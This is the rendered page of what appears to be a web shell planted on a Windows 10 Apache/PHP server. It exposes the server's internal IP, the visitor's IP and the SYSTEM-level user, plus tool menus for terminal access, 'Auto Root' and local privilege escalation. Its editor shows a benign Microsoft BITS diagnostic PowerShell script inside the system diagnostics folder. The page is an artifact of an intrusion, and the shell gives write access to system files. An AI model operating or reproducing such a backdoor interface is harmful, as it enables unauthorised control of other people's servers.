Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.140
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
Windows /
diagnostics /
system /
BITS /
Delete
Unzip
Name
Size
Permission
Date
Action
en-US
[ DIR ]
drwxrwxrwx
2023-03-23 12:54
pt-BR
[ DIR ]
drwxrwxrwx
2019-12-07 15:53
CL_Registry.ps1
19.58
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.diagpkg
6.99
KB
-rw-rw-rw-
2019-12-07 10:09
DiagPackage.dll
77
KB
-rw-rw-rw-
2019-12-07 10:09
RC_BITSACL.ps1
1.03
KB
-rw-rw-rw-
2019-12-07 10:09
RC_BITSDLL.ps1
2.17
KB
-rw-rw-rw-
2019-12-07 10:09
RC_BITSRegKeys.ps1
5.22
KB
-rw-rw-rw-
2019-12-07 10:09
RS_BITSACL.ps1
858
B
-rw-rw-rw-
2019-12-07 10:09
RS_BITSDLL.ps1
779
B
-rw-rw-rw-
2019-12-07 10:09
RS_BITSRegKeys.ps1
5.21
KB
-rw-rw-rw-
2019-12-07 10:09
TS_Main.ps1
1.77
KB
-rw-rw-rw-
2019-12-07 10:09
cl_Service.ps1
10.18
KB
-rw-rw-rw-
2019-12-07 10:09
Save
Rename
# Copyright © 2015, Microsoft Corporation. All rights reserved. # :: ======================================================= :: #==================================================================================== # Initialize #==================================================================================== Import-LocalizedData -BindingVariable Strings_RC_BITSDLL -FileName CL_LocalizationData $BitsDLLdetected = $false #==================================================================================== # Load Utilities #==================================================================================== . ./Cl_Service.ps1 #==================================================================================== # Main #==================================================================================== try { $INT_GetPackageIDResult = Get-DiagInput -ID 'INT_EnableSFC' -EA SilentlyContinue } catch { # When pack runs alone, the answer file wont be present resulting in script error, that's why try catch block is introduced } if ($INT_GetPackageIDResult -eq 'false') { return $false } $cpu = gwmi -Query 'Select * from Win32_Processor' if ( 5 -eq $cpu.Architecture ) { # Not detecting the root cause in case of ARM processor. return $false } SServicer 'bits' 'Stopped' # Running SFC for Qmgr.dll $output = sfc /scanfile="$env:windir\system32\Qmgr.dll" # Processing the output for report $sb = New-Object System.Text.StringBuilder foreach($s in $output) { if($s){$n = $sb.append($s)} } $output = $sb.Tostring().ToCharArray() $sb = New-Object System.Text.StringBuilder foreach($s in $output) { if($s){$n = $sb.append($s)} } $output = $sb.Tostring() $Global:sfcOputFile = "$env:temp\sfcOput.txt" if (Test-Path $Global:sfcOputFile) { del $Global:sfcOputFile -Force } if(![string]::IsNullOrEmpty($output)) { $output > $sfcOputFile if($output.Trim().ToLower().IndexOf('cbs.log') -gt -1) { $BitsDLLdetected = $true } } SServicer 'bits' 'Running' Update-DiagRootCause -ID 'RC_BITSDLL' -Detected $BitsDLLdetected If(!$BitsDLLdetected) { del $Global:sfcOputFile -Force } return $BitsDLLdetected